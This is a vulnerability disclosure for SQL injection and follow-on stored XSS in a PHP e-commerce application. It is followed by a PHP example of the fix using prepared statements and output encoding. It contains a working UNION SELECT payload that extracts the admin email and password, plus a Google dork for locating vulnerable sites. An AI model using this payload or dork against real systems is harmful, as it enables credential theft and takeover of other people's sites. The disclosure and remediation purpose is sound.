Ecommerce-PHP-kurniaramadhan-1.0- Sql Injection To XSS

2024.12.25
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

****************************************************************************************
#Exploit Title: Ecommerce-PHP-kurniaramadhan-1.0- Sql Injection
#Title of the Vulnerability: SQL Injection to XSS
#Product Name: E-Commerce-PHP
#Vendor: https://github.com/kurniaramadhan/
#Vulnerable Product Link: https://github.com/kurniaramadhan/E-Commerce-PHP
#Date: 2024-12-23
#Exploit Author: Maloy Roy Orko
#Google Dork: "Powered by kurniaramadhan"
#Category: Webapps
#Tested On: Android, Mac, Firefox

## Reference:
https://www.websecurityinsights.my.id/2024/12/ecommerce-php-by-kurniaramadhan-sql.html
https://portswigger.net/web-security/sql-injection

###Affected Components: Parameters, Admin Panel Create Product Fields.

#Description:
SQL Injection in "parameters" in "E-commerce PHP application By kurniaramadhan v 1.0" allows a "remote" attacker "to dump the database, gain admin access, and leads to XSS as the create product fields aren't protected" via "all parameters and create product fields".

###Proof of Concept:
### Demo :
http://192.168.1.100:8080/blog-details.php?blog_id=1+union+select+concat(admin_email,0x3a,0x3c62723e3c62723e3c2f623e41646d696e2050617373776f72643a3c2f623e,0x3c62723e,admin_password),2,3,4,5,6,7,8,9+from+admins--+

###Attack Vectors:
To exploit the vulnerability, an attacker supplies input through the parameters and can then dump the whole database or obtain the admin credentials. With those credentials the attacker can log in as admin, and because the create product fields are not protected, XSS can then be exploited there.

###Detailed Blog About The Poc:
https://www.websecurityinsights.my.id/2024/12/ecommerce-php-by-kurniaramadhan-sql.html

*********************************************************
#Discovered by: Maloy Roy Orko
#Website: https://www.websecurityinsights.my.id/
****************************************************************************************
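The two defects described above (request parameters such as blog_id reaching the SQL text, and create product fields rendered without encoding) are closed by bound parameters and output encoding. The following is an added example, not code from the E-Commerce-PHP project or from the advisory author. The table layout, the function names and the in-memory SQLite database (standing in for the application's database, requires the pdo_sqlite extension) are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Constructed in-memory schema; table and column names here are hypothetical.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE blogs (blog_id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$pdo->exec('CREATE TABLE products (product_id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO blogs VALUES (1, 'Hello', 'First post')");

// blog_id is validated as a positive integer and then bound as a parameter,
// so request data never becomes part of the SQL statement text.
function fetchBlog(PDO $pdo, string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // anything that is not a plain integer is rejected
    }
    $stmt = $pdo->prepare('SELECT blog_id, title, body FROM blogs WHERE blog_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Product fields are stored through a bound parameter, exactly as submitted.
function createProduct(PDO $pdo, string $name): int
{
    $stmt = $pdo->prepare('INSERT INTO products (name) VALUES (:name)');
    $stmt->execute([':name' => $name]);
    return (int) $pdo->lastInsertId();
}

// Encoding happens at output time, so stored markup is displayed as text.
function renderProductName(PDO $pdo, int $productId): string
{
    $stmt = $pdo->prepare('SELECT name FROM products WHERE product_id = :id');
    $stmt->bindValue(':id', $productId, PDO::PARAM_INT);
    $stmt->execute();
    $name = (string) $stmt->fetchColumn();
    return '<h2>' . htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</h2>';
}

var_dump(fetchBlog($pdo, '1'));                 // plain integer id
var_dump(fetchBlog($pdo, '1 union select 1'));  // constructed non-integer id
$pid = createProduct($pdo, '<b>Mug</b> & "Co"'); // constructed product name with markup
echo renderProductName($pdo, $pid), PHP_EOL;
```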

Copyright 2024, cxsecurity.com

 
